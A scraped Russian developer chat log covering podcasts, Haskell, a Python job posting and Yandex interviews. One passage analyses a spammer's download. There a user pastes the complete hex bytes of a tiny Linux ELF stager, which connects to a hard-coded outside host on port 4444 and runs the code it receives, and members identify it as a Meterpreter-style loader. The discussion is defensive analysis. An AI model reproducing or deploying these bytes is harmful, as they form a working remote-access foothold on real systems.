
Zart
23.11.2017
15:41:07
я аж засомневался

Roman
23.11.2017
18:25:10

Danil
23.11.2017
18:35:24
@vup_vup, милый товарищ, гоните его и из соседнего чатика ) да еще и скрипты написаны отвратительно, выяснили что там скачивалось то? kasper говорит что вирусняк.

Lada
23.11.2017
18:35:49
7F 45 4C 46 01 01 01 00 00 00 00 00 00 00 00 00 02 00 03 00 01 00 00 00 54 80 04 08 34 00 00 00 00 00 00 00 00 00 00 00 34 00 20 00 01 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 80 04 08 00 80 04 08 CF 00 00 00 4A 01 00 00 07 00 00 00 00 10 00 00 6A 0A 5E 31 DB F7 E3 53 43 53 6A 02 B0 66 89 E1 CD 80 97 5B 68 91 F9 68 47 68 02 00 11 5C 89 E1 6A 66 58 50 51 57 89 E1 43 CD 80 85 C0 79 19 4E 74 3D 68 A2 00 00 00 58 6A 00 6A 05 89 E3 31 C9 CD 80 85 C0 79 BD EB 27 B2 07 B9 00 10 00 00 89 E3 C1 EB 0C C1 E3 0C B0 7D CD 80 85 C0 78 10 5B 89 E1 99 B6 0C B0 03 CD 80 85 C0 78 02 FF E1 B8 01 00 00 00 BB 01 00 00 00 CD 80
Вот чё в бинаре было. Как понять что тут происходит?

Google

Lada
23.11.2017
18:36:12
Оттуда выгнали, сюда пришел)

Danil
23.11.2017
18:36:23

Vitali K.
23.11.2017
18:36:57
Это весь бинарь?
На exe не похоже

Danil
23.11.2017
18:37:04
да, он там совсем мелкий

Vitali K.
23.11.2017
18:37:15
Дык надо его в дизассемблер

Dmitry
23.11.2017
18:37:34
это ELF, сейчас гляну.

Danil
23.11.2017
18:39:32

Matvey
23.11.2017
18:41:41
Касперский сам заражен, не слушайте его

groke
23.11.2017
18:43:27
Это лоадер написанный на асме судя по cd 80 и размеру

Dmitry
23.11.2017
18:43:46
во Егора послушайте)

groke
23.11.2017
18:43:50
Он типо должен основную малварь качнуть

Dmitry
23.11.2017
18:44:15
да там откуда-то сам шелкод берётся

Google

groke
23.11.2017
18:47:24
Ну я видел такие файлы они просто сразу на асме пишут и сразу на точке входа их код. Ща до дома доеду чекну)

Dmitry
23.11.2017
18:48:27
ну тут похоже что он на сокете ждёт шелл и потом его исполняет

Vitali K.
23.11.2017
18:50:29

Roman
23.11.2017
18:51:04

groke
23.11.2017
18:52:16
Cd 80 это int 80h в хексах

Vitali K.
23.11.2017
18:53:03
а понятно

b0g3r
23.11.2017
19:05:22

groke
23.11.2017
19:12:13
https://www.virustotal.com/#/file/4670b4240b83f2541cef92a1dbc3dcac7e37ebb2b4594cbc15710c012bf7b6b7/detection
забавно, файл который скачивается почти никто не детектит)
payload?
https://github.com/rapid7/mettle вот это в payload там)

Lada
23.11.2017
19:45:02
И что оно делает?

groke
23.11.2017
19:51:26
судя по описанию от авторов это аналог meterpreter для *nix систем. по идее значит там должен быть шелл + как минимум я видел какие то функции чтоб с вебкамерой работать

Stepan
23.11.2017
20:49:49
хохохо https://github.com/maxpert/raspchat/releases/tag/v1.0.0-alpha
> Ditching Go for Node.js

Dmitry
23.11.2017
20:55:37
?
я не видел код на go, но тут всё довольно понятно написано и не так много кода. приятно читать. хз насколько хорошо с точки зрения JS.

Stepan
23.11.2017
21:35:10
я особо не вникал, но код норм
> Съездите на митап в Хельсинки, вы туда так и так ездите за рыбой на маршрутке
?
слушаю подкаст с @nazarov_tech https://spb-frontend.ru/podcast/18/

Dmitry
24.11.2017
09:23:54
:) надо послушать.

Google

Dmitry
24.11.2017
09:46:44
слушаю.
ребят, haskell не эзотерический язык)

Aleksandr
24.11.2017
09:56:44
Питонистом назвавшим фронтенд говном был @lig?

Dmitry
24.11.2017
09:57:09
он так не говорил

Aleksandr
24.11.2017
09:57:27
т.е. он, ясно

Dmitry
24.11.2017
09:57:41
?

Admin
ERROR: S client not available

Aleksandr
24.11.2017
10:05:29
ископаемый язык хаскелл
лiл

Dmitry
24.11.2017
10:08:33
слушаю.
ребят, haskell не эзотерический язык)

Sergey
24.11.2017
10:19:21

Roman
24.11.2017
10:25:27

Aleksandr
24.11.2017
10:27:57
чтобы было быстро нада хорошо понимать что ты делаешь
просто проблема то в том, что язык как бы говорит тебе - псс парень, не думай ни о чем, херач
а так не выходит

Dmitry
24.11.2017
12:55:12
под конец такие интересные темы начали обсуждать.

Roman
24.11.2017
13:16:15


Kate
24.11.2017
13:21:37
#python #москва #fulltime #backend
В дружную команду Ремонтник.ру ищем опытного разработчика python. Давайте вместе делать сервис, который приносит пользу тысячам людей каждый день!
Обязанности
* Работа над новыми проектами основного сервиса;
* Расширение и повышение качества имеющегося кода;
Требования
* глубокое знание Python и принципов ООП;
* опыт написания понятного, соответсвующего стандартам PEP и документированного кода;
* практический опыт покрытия логики тестами;
* хорошее понимание технологий современного веба: REST, async, websockets; хорошее знание современных БД: postgresql, MongoDB, redis;
* умение хорошо формулировать мысли в письменном и устном виде.
Желательно
* опыт командной работы с git;
* опыт работы с TDD;
* желание изучать новые языки и парадигмы;
* опыт удаленной работы и работы по agile/kanban;
* хорошее знание английского
Условия
* Зарплата белая от 120 000 руб до 150 000 руб по результатам собеседования;
* Гибкий график работы, можно иногда работать удалённо, а можно обсудить полную удаленку
* Адекватный дружелюбный коллектив
Отклики можно присылать на es@remontnik.ru


Sergey
24.11.2017
13:31:28
Да, он самый

Google

Zart
24.11.2017
14:48:57
а что было?

Ruslan
24.11.2017
14:49:30
классическая жалоба на яндекс

Zart
24.11.2017
14:52:35
я собеседовался в яндекс, но там была работа по портированию жаботестов в питонотесты и еще какая-то неведомая хуйня. взаимно не подошли друг другу 8)

Егор
24.11.2017
14:53:21
Что-то я сомневаюсь про 11 собеседований.

Zart
24.11.2017
14:53:22
ага

Егор
24.11.2017
14:54:05
Обычно скайп, день в офисе (~5 треков), менеджерская. Что тоже, конечно, не мало.